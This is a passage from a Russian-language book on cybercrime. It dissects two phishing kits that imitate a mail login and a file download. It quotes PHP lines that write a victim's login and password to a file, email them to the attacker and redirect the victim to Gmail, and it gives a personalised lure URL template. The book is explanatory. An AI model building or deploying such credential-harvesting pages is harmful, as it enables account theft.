Читаем Особенности киберпреступлений в России: инструменты нападения и защиты информации полностью

Задается адрес электронной почты, куда программа будет отправлять вновь поступающие данные в онлайн-режиме, в рассматриваемом примере это testP99800@yahoo.com, и определяется ресурс, куда будет отправляться пользователь после получения от него всего, чего хотелось злоумышленнику, в данном случае — http://mail. google.com.

Можно задать любой ресурс для возврата пользователя, практически все, что угодно, но злоумышленники в целях конспирации отправляют пользователя обратно «домой» в его учетную запись на родной официальный почтовый сервер, откуда его обманом и вытянули.

Операции в строке

if($login == "" || $pass == "") { header("Location: index. php?err&login=".$login); exit; }

осуществляют проверку на возможность пустых значений вместо введенных пользователем своих данных о логине и пароле. Следующий блок строк:

if($valid_file!= "")

{

$file = fopen($valid_file, 'a'); fwrite($file, "$login:$pass\r\n"); fclose($file);

}

В этом месте скрипт открывает файл, предназначенный для записи украденных данных, и осуществляет в него запись логина и пароля пользователя. В приведенном примере в текстовый файл aspushkin.txt по порядку записываются поступающие данные, после чего файл закрывается.

Стоит также обратить внимание на строки:

if($email!= "") mail($email, "Data from google", "$login:$pass"); header('Location: '.$location);

При выполнении функций первой строки осуществляется отправка данных на установленный в настройках движка электронный потовый адрес злоумышленника, а второй отправляет пользователя по заданному адресу, после чего шоу окончено.

Пройдем этот путь. Открываем наш localhost, работающий под установленной ранее AMPPS, и наблюдаем интерфейс подставного почтового сервера, который так и манит ввести логин и пароль (рис. 1.26).

Рис. 1.26.Интерфейс фишинг-движка

Нужно понимать, что на эту страницу фэйка пользователь попадает по ссылке вида:

http://ФИШИНГ-ДОМЕН/?Login=ЛОГИН-ПОЛЬЗОВАТЕЛЯ&Domain=ДОМЕН ПОЛЬЗОВАТЕЛЯ&id=mojnovstavitidnuonnenujen12433644800000023780&msg=chtotoochennujnoe17823612391283756

В данном случае используется тривиальная, но великолепная возможность языка PHP под определением «ассоциативный массив параметров, переданных скрипту через URL».

Если проще, то данная возможность позволяет передавать данные, внедряя их в строку ссылки. Поэтому нужно открыть эту страницу правильно. Вот так, например, на страницу попадает пользователь с логином «pochtauserar» по ссылке http://localhost/mdex.php?login=pochtauserar& (рис. 1.27):

Рис. 1.27.Интерфейс фэйка с именем пользователя, переданным через строку ссылки

Теперь интерфейс фишинг-движка встречает нас практически персонально, с указанием нашего логина электронной почты на странице.

Не будем заставлять его долго ждать и введем свои учетные данные, а вернее пароль: «superpassword».

Если проверить теперь файл aspushkin.txt, можно убедиться, что введенный пароль, а также имя нашей учетной записи успешно записаны в файл: «pochtauserar: superpassword».

Рис. 1.28.Учетные данные, сохраненные в текстовом файле на сервере

Помимо этого, мы помним, что введенные данные были отправлены на электронный адрес, заданный в файле фишинг-движка.

Фишинг-движок изнутри. Пример 2

Теперь рассмотрим более интересный экземпляр фэйка, с имитацией загрузки файла, который по статистике очень «нравится» пользователям.

Он состоит из следующих файлов (рис. 1.29):

Рис. 1.29.Файлы фишинг-движка

Имитация обращения к присланному в письме злоумышленником файлу выглядит следующим образом (рис. 1.30):

Рис. 1.30.Имитация обращения к файлу

В данном случае пользователь пытается открыть присланный файл schet.pdf.

При этом пробегает анимированная полоса загрузки, создающая иллюзию процесса, но что-то, видимо, пошло не так, и для продолжения требуется авторизация (рис. 1.31).

Рис. 1.31.Окно авторизации фэйка

В настройках данного фишинг-движка приблизительно то же самое, что и в предыдущем примере, кроме дополнительного программного файла, содержащего сценарий загрузки несуществующего файла, в данном случае это файл view.php. Фрагмент его содержимого приведен на рис. 1.32.

Рис 1.32.Фрагмент содержимого файла view.php

В файле login.php содержатся параметры, которые злоумышленник может изменять от случая к случаю (рис. 1.33).